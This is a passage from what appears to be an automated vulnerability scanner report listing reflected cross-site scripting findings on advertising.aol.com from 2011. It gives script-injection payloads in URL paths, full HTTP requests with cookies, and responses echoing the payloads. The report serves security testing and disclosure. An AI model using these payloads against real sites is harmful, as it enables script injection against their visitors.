   s_265.eVar1="/4c934"-alert(1)-"95baf5a60d2/0/3/295357155/";
   s_265.tl(this,'o','aol ad simple contact');
}

function runOmni()
{
s_265.pfxID="adv";
s_265.pageName="Main";
s_265.channel="us.aolad";
s_265.linkInternalFilters="javascript:,adverti
...[SNIP]...

4.69. http://advertising.aol.com/token/0/3/295357155/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://advertising.aol.com
Path:   /token/0/3/295357155/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cc591"><script>alert(1)</script>5fdf988b5f6 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /cc591"><script>alert(1)</script>5fdf988b5f6/0/3/295357155/ HTTP/1.1
Host: advertising.aol.com
Proxy-Connection: keep-alive
Referer: http://advertising.aol.com/nai/nai.php?action_id=3
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|27329332051D1158-60000108802F7C0B[CE]; s_pers=%20s_getnr%3D1315270057850-New%7C1378342057850%3B%20s_nrgvo%3DNew%7C1378342057854%3B; UNAUTHID=1.56118f34d7f711e0bb11edb33f645290.f2d4

Response

HTTP/1.1 404 Not Found
Date: Sat, 17 Sep 2011 16:48:55 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sat, 17 Sep 2011 16:48:55 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html; charset=utf-8
Content-Length: 13470

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<m
...[SNIP]...
<link rel="canonical" href="http://advertising.aol.com/cc591"><script>alert(1)</script>5fdf988b5f6/0/3/295357155/" />
...[SNIP]...

4.70. http://advertising.aol.com/token/1/1/819977518/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://advertising.aol.com
Path:   /token/1/1/819977518/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7bbcc"-alert(1)-"5e9b9073576 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /7bbcc"-alert(1)-"5e9b9073576/1/1/819977518/ HTTP/1.1
Host: advertising.aol.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://advertising.aol.com/nai/nai.php?action_id=3
Cookie: s_vi=[CS]v1|2722E805851D03EA-400001380002FA31[CE]; s_pers=%20s_getnr%3D1314627287324-Repeat%7C1377699287324%3B%20s_nrgvo%3DRepeat%7C1377699287326%3B; UNAUTHID=1.a5de2f9cc54911e0b91bbfa5e75487be.f26b

Response

HTTP/1.1 404 Not Found
Date: Sat, 17 Sep 2011 17:16:10 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sat, 17 Sep 2011 17:16:10 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html; charset=utf-8
Content-Length: 13400

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<m
...[SNIP]...
r s_265=s_gi('aolamn,aolsvc');
   s_265.linkTrackVars='evar1,events,products';
   s_265.linkTrackEvents='prodView';
   s_265.events="prodView";
   s_265.products='aolad;aolad simple contact;;';
   s_265.eVar1="/7bbcc"-alert(1)-"5e9b9073576/1/1/819977518/";
   s_265.tl(this,'o','aol ad simple contact');
}

function runOmni()
{
s_265.pfxID="adv";
s_265.pageName="Main";
s_265.channel="us.aolad";
s_265.linkInternalFilters="javascript:,adverti
...[SNIP]...

4.71. http://advertising.aol.com/token/1/1/819977518/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://advertising.aol.com
Path:   /token/1/1/819977518/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b471f"><script>alert(1)</script>eb118a49685 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /b471f"><script>alert(1)</script>eb118a49685/1/1/819977518/ HTTP/1.1
Host: advertising.aol.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://advertising.aol.com/nai/nai.php?action_id=3
Cookie: s_vi=[CS]v1|2722E805851D03EA-400001380002FA31[CE]; s_pers=%20s_getnr%3D1314627287324-Repeat%7C1377699287324%3B%20s_nrgvo%3DRepeat%7C1377699287326%3B; UNAUTHID=1.a5de2f9cc54911e0b91bbfa5e75487be.f26b

Response

HTTP/1.1 404 Not Found
Date: Sat, 17 Sep 2011 17:16:06 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sat, 17 Sep 2011 17:16:06 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html; charset=utf-8
Content-Length: 13470

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<m
...[SNIP]...
<link rel="canonical" href="http://advertising.aol.com/b471f"><script>alert(1)</script>eb118a49685/1/1/819977518/" />
...[SNIP]...

4.72. http://advertising.aol.com/token/1/3/1696897902/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://advertising.aol.com
Path:   /token/1/3/1696897902/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 35087"><script>alert(1)</script>a361881a94b was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /35087"><script>alert(1)</script>a361881a94b/1/3/1696897902/ HTTP/1.1
Host: advertising.aol.com
Proxy-Connection: keep-alive
Referer: http://advertising.aol.com/nai/nai.php?action_id=3
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|27329332051D1158-60000108802F7C0B[CE]; s_pers=%20s_getnr%3D1315270057850-New%7C1378342057850%3B%20s_nrgvo%3DNew%7C1378342057854%3B; UNAUTHID=1.56118f34d7f711e0bb11edb33f645290.f2d4

Response

HTTP/1.1 404 Not Found
Date: Sat, 17 Sep 2011 16:48:33 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sat, 17 Sep 2011 16:48:33 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html; charset=utf-8
Content-Length: 13474

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<m
...[SNIP]...
<link rel="canonical" href="http://advertising.aol.com/35087"><script>alert(1)</script>a361881a94b/1/3/1696897902/" />
...[SNIP]...

4.73. http://advertising.aol.com/token/1/3/1696897902/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://advertising.aol.com
Path:   /token/1/3/1696897902/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload caa83"-alert(1)-"7556a413751 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /caa83"-alert(1)-"7556a413751/1/3/1696897902/ HTTP/1.1
Host: advertising.aol.com
Proxy-Connection: keep-alive
Referer: http://advertising.aol.com/nai/nai.php?action_id=3
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|27329332051D1158-60000108802F7C0B[CE]; s_pers=%20s_getnr%3D1315270057850-New%7C1378342057850%3B%20s_nrgvo%3DNew%7C1378342057854%3B; UNAUTHID=1.56118f34d7f711e0bb11edb33f645290.f2d4

Response

HTTP/1.1 404 Not Found
Date: Sat, 17 Sep 2011 16:48:36 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sat, 17 Sep 2011 16:48:36 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html; charset=utf-8
Content-Length: 13404

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<m
...[SNIP]...
r s_265=s_gi('aolamn,aolsvc');
   s_265.linkTrackVars='evar1,events,products';
   s_265.linkTrackEvents='prodView';
   s_265.events="prodView";
   s_265.products='aolad;aolad simple contact;;';
   s_265.eVar1="/caa83"-alert(1)-"7556a413751/1/3/1696897902/";
   s_265.tl(this,'o','aol ad simple contact');
}

function runOmni()
{
s_265.pfxID="adv";
s_265.pageName="Main";
s_265.channel="us.aolad";
s_265.linkInternalFilters="javascript:,advert
...[SNIP]...

4.74. http://advertising.aol.com/token/2/2/1032347115/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://advertising.aol.com
Path:   /token/2/2/1032347115/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bd412"><script>alert(1)</script>b937435e28d was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /bd412"><script>alert(1)</script>b937435e28d/2/2/1032347115/ HTTP/1.1
Host: advertising.aol.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://advertising.aol.com/nai/nai.php?action_id=3
Cookie: s_vi=[CS]v1|2722E805851D03EA-400001380002FA31[CE]; s_pers=%20s_getnr%3D1314627287324-Repeat%7C1377699287324%3B%20s_nrgvo%3DRepeat%7C1377699287326%3B; UNAUTHID=1.a5de2f9cc54911e0b91bbfa5e75487be.f26b

Response

HTTP/1.1 404 Not Found
Date: Sat, 17 Sep 2011 17:16:02 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sat, 17 Sep 2011 17:16:02 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html; charset=utf-8
Content-Length: 13474

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<m
...[SNIP]...
<link rel="canonical" href="http://advertising.aol.com/bd412"><script>alert(1)</script>b937435e28d/2/2/1032347115/" />
...[SNIP]...

4.75. http://advertising.aol.com/token/2/2/1032347115/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://advertising.aol.com
Path:   /token/2/2/1032347115/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 28ac5"-alert(1)-"2fff1594f74 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /28ac5"-alert(1)-"2fff1594f74/2/2/1032347115/ HTTP/1.1
Host: advertising.aol.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://advertising.aol.com/nai/nai.php?action_id=3
Cookie: s_vi=[CS]v1|2722E805851D03EA-400001380002FA31[CE]; s_pers=%20s_getnr%3D1314627287324-Repeat%7C1377699287324%3B%20s_nrgvo%3DRepeat%7C1377699287326%3B; UNAUTHID=1.a5de2f9cc54911e0b91bbfa5e75487be.f26b

Response

HTTP/1.1 404 Not Found
Date: Sat, 17 Sep 2011 17:16:05 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sat, 17 Sep 2011 17:16:05 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html; charset=utf-8
Content-Length: 13404

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<m
...[SNIP]...
r s_265=s_gi('aolamn,aolsvc');
   s_265.linkTrackVars='evar1,events,products';
   s_265.linkTrackEvents='prodView';
   s_265.events="prodView";
   s_265.products='aolad;aolad simple contact;;';
   s_265.eVar1="/28ac5"-alert(1)-"2fff1594f74/2/2/1032347115/";
   s_265.tl(this,'o','aol ad simple contact');
}

function runOmni()
{
s_265.pfxID="adv";
s_265.pageName="Main";
s_265.channel="us.aolad";
s_265.linkInternalFilters="javascript:,advert
...[SNIP]...

4.76. http://advertising.aol.com/token/2/3/1397978719/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://advertising.aol.com
Path:   /token/2/3/1397978719/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e5869"-alert(1)-"7954e14cf3a was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /e5869"-alert(1)-"7954e14cf3a/2/3/1397978719/ HTTP/1.1
Host: advertising.aol.com
Proxy-Connection: keep-alive
Referer: http://advertising.aol.com/nai/nai.php?action_id=3
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|27329332051D1158-60000108802F7C0B[CE]; s_pers=%20s_getnr%3D1315270057850-New%7C1378342057850%3B%20s_nrgvo%3DNew%7C1378342057854%3B; UNAUTHID=1.56118f34d7f711e0bb11edb33f645290.f2d4

Response

HTTP/1.1 404 Not Found
Date: Sat, 17 Sep 2011 16:49:18 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sat, 17 Sep 2011 16:49:18 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html; charset=utf-8
Content-Length: 13404

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<m
...[SNIP]...
r s_265=s_gi('aolamn,aolsvc');
   s_265.linkTrackVars='evar1,events,products';
   s_265.linkTrackEvents='prodView';
   s_265.events="prodView";
   s_265.products='aolad;aolad simple contact;;';
   s_265.eVar1="/e5869"-alert(1)-"7954e14cf3a/2/3/1397978719/";
   s_265.tl(this,'o','aol ad simple contact');
}

function runOmni()
{
s_265.pfxID="adv";
s_265.pageName="Main";
s_265.channel="us.aolad";
s_265.linkInternalFilters="javascript:,advert
...[SNIP]...

4.77. http://advertising.aol.com/token/2/3/1397978719/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://advertising.aol.com
Path:   /token/2/3/1397978719/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f3f59"><script>alert(1)</script>80ff9213020 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /f3f59"><script>alert(1)</script>80ff9213020/2/3/1397978719/ HTTP/1.1
Host: advertising.aol.com
Proxy-Connection: keep-alive
Referer: http://advertising.aol.com/nai/nai.php?action_id=3
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|27329332051D1158-60000108802F7C0B[CE]; s_pers=%20s_getnr%3D1315270057850-New%7C1378342057850%3B%20s_nrgvo%3DNew%7C1378342057854%3B; UNAUTHID=1.56118f34d7f711e0bb11edb33f645290.f2d4

Response

HTTP/1.1 404 Not Found
Date: Sat, 17 Sep 2011 16:49:12 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sat, 17 Sep 2011 16:49:12 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html; charset=utf-8
Content-Length: 13474

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<m
...[SNIP]...
<link rel="canonical" href="http://advertising.aol.com/f3f59"><script>alert(1)</script>80ff9213020/2/3/1397978719/" />
...[SNIP]...

4.78. http://advertising.aol.com/token/3/1/8239370/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://advertising.aol.com
Path:   /token/3/1/8239370/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8c676"-alert(1)-"c7ef434fbbc was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /8c676"-alert(1)-"c7ef434fbbc/3/1/8239370/ HTTP/1.1
Host: advertising.aol.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://advertising.aol.com/nai/nai.php?action_id=3
Cookie: s_vi=[CS]v1|2722E805851D03EA-400001380002FA31[CE]; s_pers=%20s_getnr%3D1314627287324-Repeat%7C1377699287324%3B%20s_nrgvo%3DRepeat%7C1377699287326%3B; UNAUTHID=1.a5de2f9cc54911e0b91bbfa5e75487be.f26b

Response

HTTP/1.1 404 Not Found
Date: Sat, 17 Sep 2011 17:16:52 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sat, 17 Sep 2011 17:16:52 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html; charset=utf-8
Content-Length: 13392

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<m
...[SNIP]...
r s_265=s_gi('aolamn,aolsvc');
   s_265.linkTrackVars='evar1,events,products';
   s_265.linkTrackEvents='prodView';
   s_265.events="prodView";
   s_265.products='aolad;aolad simple contact;;';
   s_265.eVar1="/8c676"-alert(1)-"c7ef434fbbc/3/1/8239370/";
   s_265.tl(this,'o','aol ad simple contact');
}

function runOmni()
{
s_265.pfxID="adv";
s_265.pageName="Main";
s_265.channel="us.aolad";
s_265.linkInternalFilters="javascript:,advertisi
...[SNIP]...

4.79. http://advertising.aol.com/token/3/1/8239370/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://advertising.aol.com
Path:   /token/3/1/8239370/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c8003"><script>alert(1)</script>e599192043c was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /c8003"><script>alert(1)</script>e599192043c/3/1/8239370/ HTTP/1.1
Host: advertising.aol.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://advertising.aol.com/nai/nai.php?action_id=3
Cookie: s_vi=[CS]v1|2722E805851D03EA-400001380002FA31[CE]; s_pers=%20s_getnr%3D1314627287324-Repeat%7C1377699287324%3B%20s_nrgvo%3DRepeat%7C1377699287326%3B; UNAUTHID=1.a5de2f9cc54911e0b91bbfa5e75487be.f26b

Response

HTTP/1.1 404 Not Found
Date: Sat, 17 Sep 2011 17:16:48 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sat, 17 Sep 2011 17:16:48 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html; charset=utf-8
Content-Length: 13462

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<m
...[SNIP]...
<link rel="canonical" href="http://advertising.aol.com/c8003"><script>alert(1)</script>e599192043c/3/1/8239370/" />
...[SNIP]...

4.80. http://advertising.aol.com/token/3/3/1557169105/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://advertising.aol.com
Path:   /token/3/3/1557169105/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4c13a"-alert(1)-"8431ceb2f9d was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /4c13a"-alert(1)-"8431ceb2f9d/3/3/1557169105/ HTTP/1.1
Host: advertising.aol.com
Proxy-Connection: keep-alive
Referer: http://advertising.aol.com/nai/nai.php?action_id=3
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|27329332051D1158-60000108802F7C0B[CE]; s_pers=%20s_getnr%3D1315270057850-New%7C1378342057850%3B%20s_nrgvo%3DNew%7C1378342057854%3B; UNAUTHID=1.56118f34d7f711e0bb11edb33f645290.f2d4

Response

HTTP/1.1 404 Not Found
Date: Sat, 17 Sep 2011 16:48:52 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Expires: Sun, 19 Nov 1978 05:00:00 GMT
